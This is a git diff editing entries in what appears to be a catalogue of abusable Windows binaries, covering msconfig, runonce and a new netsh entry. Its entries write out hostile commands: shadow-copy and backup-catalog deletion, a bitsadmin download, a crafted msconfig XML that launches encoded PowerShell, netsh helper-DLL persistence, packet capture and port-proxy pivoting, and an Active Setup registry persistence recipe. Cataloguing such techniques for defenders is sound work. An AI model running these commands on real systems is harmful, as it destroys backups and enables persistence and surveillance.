Adjustments
parent
a9094f0d47
commit
d14a899655
|
@ -6,7 +6,6 @@ Robocopy.exe Needs examples
|
||||||
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
||||||
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
||||||
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
||||||
netsh.exe Netsh helper dll file loading
|
|
||||||
wbadmin.exe wbadmin delete catalog -quiet
|
wbadmin.exe wbadmin delete catalog -quiet
|
||||||
psexec.exe Remote execution of code
|
psexec.exe Remote execution of code
|
||||||
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
||||||
|
|
|
@ -1,16 +1,5 @@
|
||||||
## Msconfig.exe
|
## Msconfig.exe
|
||||||
|
|
||||||
* Prerequisites
|
|
||||||
|
|
||||||
add a crafted .xml in System32
|
|
||||||
```
|
|
||||||
<?xml version="1.0" ?>
|
|
||||||
<MSCONFIGTOOLS>
|
|
||||||
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"
|
|
||||||
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
|
|
||||||
</MSCONFIGTOOLS>
|
|
||||||
```
|
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -31,7 +20,14 @@ c:\windows\system32\msconfig.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
* Prerequisites
|
||||||
|
add a crafted .xml in System32
|
||||||
|
|
||||||
|
```
|
||||||
|
<?xml version="1.0" ?>
|
||||||
|
<MSCONFIGTOOLS>
|
||||||
|
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"
|
||||||
|
DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
|
||||||
|
</MSCONFIGTOOLS>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
## Netsh.exe
|
||||||
|
|
||||||
|
* Functions: Execute, Surveillance
|
||||||
|
|
||||||
|
```
|
||||||
|
netsh trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl
|
||||||
|
netsh trace show status
|
||||||
|
|
||||||
|
netsh.exe add helper C:\Path\file.dll
|
||||||
|
|
||||||
|
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
*
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
|
* https://attack.mitre.org/wiki/Technique/T1128
|
||||||
|
* https://twitter.com/teemuluotio/status/990532938952527873
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\netsh.exe
|
||||||
|
c:\windows\sysWOW64\netsh.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Detection:
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,16 +1,9 @@
|
||||||
## Runonce.exe
|
## Runonce.exe
|
||||||
|
|
||||||
* Prerequisites
|
|
||||||
|
|
||||||
1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
|
|
||||||
2) Create two Strings :
|
|
||||||
a) @ : Hi from Active Setup
|
|
||||||
b) StubPath : calc.exe
|
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
Runonce.exe /AlternateShellStartup
|
Runonce.exe /AlternateShellStartup
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -24,10 +17,16 @@ Resources:
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
c:\windows\system32\runonce.exe
|
c:\windows\system32\runonce.exe
|
||||||
|
c:\windows\sysWOW64\runonce.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
* Prerequisites
|
||||||
|
|
||||||
|
1) Create HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\[YOURKEY]
|
||||||
|
2) Create two Strings :
|
||||||
|
a) @ : Hi from Active Setup
|
||||||
|
b) StubPath : calc.exe
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|